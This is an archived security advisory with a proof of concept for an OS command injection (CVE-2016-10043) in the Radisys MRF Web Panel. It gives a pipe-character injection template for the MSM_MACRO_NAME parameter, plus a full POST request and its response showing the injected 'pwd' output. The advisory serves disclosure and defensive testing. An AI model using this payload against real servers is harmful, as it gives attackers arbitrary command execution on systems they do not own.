Skip to content
cyberexploits
webappwebtext

Radisys MRF - Command Injection

Radisys MRF - Command Injection

Published on 2017-01-27

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/cgi/webapps/41179.txt7eac4c3a
raw
Title:      MRF Web Panel OS Command Injection

Vendor:     Radisys

Vendor Homepage: http://www.radisys.com

Product:    MRF Web Panel (SWMS)

Version:    9.0.1

CVE:        CVE-2016-10043

CWE:        CWE-78

Risk Level: High



Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos

            COSMOTE (OTE Group) Information & Network Security



-----------------------------------------------------------------------------------------





Vulnerability Details:



The MRF Web Panel (SWMS) is vulnerable to OS Command Injection

attacks.



> Affected parameter: MSM_MACRO_NAME (POST parameter)

> Affected file: ms.cgi (/swms/ms.cgi)

> Verified Affected Operation: Show Fatal Error and Log Package Configuration



It is possible to use the pipe character (|) to inject arbitrary OS commands

and retrieve the output in the application's responses:



MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #





Proof Of Concept:



1. Login to the vulnerable MRF web panel (with a standard user account): 

   https://<vulnerable>/swms

2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)

3. Modify and send the following POST request:



POST /swms/ms.cgi HTTP/1.1

Host: <vulnerable>

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 213



MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute



4. Check the output of the injected command 'pwd' in the response:



HTTP/1.1 200 OK

Date: Thu, 21 Jul 2016 08:18:43 GMT

Server: Apache

Cache-Control: no-cache

Connection: close

Content-Type: text/html; charset=UTF-8

Content-Length: 23



/var/opt/swms/www/html





Vulnerability Impact:



Application's own data and functionality or the web server can be compromised due

to OS command injection vulnerabilities. It may also be possible to use the server

as a platform for attacks against other systems.





Disclaimer:



The responsible disclosure policy has been followed
View on GitHub